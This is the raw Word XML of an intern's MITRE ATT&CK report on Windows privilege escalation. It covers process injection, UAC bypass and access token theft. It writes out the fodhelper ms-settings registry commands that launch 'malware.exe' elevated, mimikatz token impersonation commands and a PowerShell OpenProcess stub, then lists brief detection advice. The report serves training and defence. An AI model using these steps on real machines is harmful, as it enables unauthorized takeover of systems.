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8C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intern Name:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Gautam Poojari</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intern ID:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 251</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2-08-2025</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task Title:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MITRE ATTACK PoC — Privilege Escalation Tactic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="tactic-privilege-escalation-ta0004"/>
      <w:r>
        <w:t>🔋</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tactic: Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The adversary’s goal is to gain higher-level permissions on a system after initial access. This PoC illustrates techniques attackers may use to elevate privileges from user to administrator or SYSTEM level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="techniques-used"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>⚙</w:t>
      </w:r>
      <w:r>
        <w:t>️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Techniques Used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="t1055-process-injection"/>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1055 – Process Injectio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Injecting malicious code into the memory space of another process to evade defenses or escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="Xa33a2c0ca69c560898ccbb86d94857a6b908baf"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1548.002 – Abuse Elevation Control Mechanism: Bypass UAC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Bypassing User Account Control (UAC) prompts to execute code with elevated privileges</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="X7ebc1669ff2805bfb1e0eef2d149a65367125a3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1134.001 – Access Token Manipulation: Token Impersonation/Theft</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Hijacking access tokens of privileged processes to impersonate high-privilege users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="procedures"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t>📄</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="procedure-1-process-injection-t1055"/>
      <w:r>
        <w:t>Procedure 1 — Process Injection (T1055):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00610D8F" w:rsidRPr="00610D8F" w:rsidRDefault="00610D8F" w:rsidP="00610D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00610D8F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="577F5559" wp14:editId="70A29954">
            <wp:extent cx="5943600" cy="24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6548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Create or download a tool like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> o</w:t>
      </w:r>
      <w:r>
        <w:t>r use built-in PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t>$code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'[DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(...)'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>Add-Type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MemberDefinition </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t>$code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Namespace Win32 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>Name API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Inject shellcode into a target process (like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>notepad.exe</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Shellcode r</w:t>
      </w:r>
      <w:r>
        <w:t>uns with target process privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="procedure-2-uac-bypass-t1548.002"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:t xml:space="preserve"> Procedure 2 — UAC Bypass (T1548.002):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00610D8F" w:rsidRDefault="00610D8F" w:rsidP="00610D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="1324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3 1621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8F" w:rsidRPr="00610D8F" w:rsidRDefault="00610D8F" w:rsidP="00610D8F">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5981700" cy="3002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03 1622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578" cy="30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C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a UAC-bypass payload with tools like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>fodhelper.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>eventvwr.msc</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Place malicious code in expected registry key:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t>reg add HKCU\Software\Classes\ms-settings\shell\open\comma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>/d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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malware.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">reg add HKCU\Software\Classes\ms-settings\shell\open\command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>/v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"DelegateExecute"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Launch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>fodhelper.exe</w:t>
      </w:r>
      <w:r>
        <w:t>, which executes with elevated privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="procedure-3-access-token-theft-t1134.001"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Procedure 3 — Access Token Theft (T1134.001):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>whoami /priv</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to confirm privilege level.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>mimikatz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to list tokens:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>privilege::debug</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>token::list</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>token::impersonate /id:1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Perform actions as impersonated SYSTEM/admin user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="detection-mitigations"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>🛡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection &amp; Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process Injection:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Monitor memory allocations, alert on suspicious API usage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UAC Bypass:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detect unexpected use of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>fodhelper.exe</w:t>
      </w:r>
      <w:r>
        <w:t>, audit registry keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Token Theft:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Monitor token manipulation attempts; enforce LSASS protection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF" w:rsidP="00610D8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="summary"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>This PoC demonstrates privilege esc</w:t>
      </w:r>
      <w:r>
        <w:t>alation techniques where attackers bypass security controls or hijack trusted processes. Awareness of these methods can help build better endpoint detection and response (EDR) strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="006548C6" w:rsidRDefault="007B3DBF">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Submitted to:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Digisuraksha Parhari Foundation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:sectPr w:rsidR="006548C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533E"/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000A990"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC20F2D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5F444F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ED2F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2A96E5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="79448784"/>
    <w:lvl w:ilvl="0" w:tplc="04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C6"/>
    <w:rsid w:val="0015042C"/>
    <w:rsid w:val="00382CE1"/>
    <w:rsid w:val="00610D8F"/>
    <w:rsid w:val="006548C6"/>
    <w:rsid w:val="007B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1D01"/>
  <w15:docId w15:val="{B24E7231-1586-4409-9177-4396A6DB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Zack</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>Zack</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-03T11:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-03T11:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>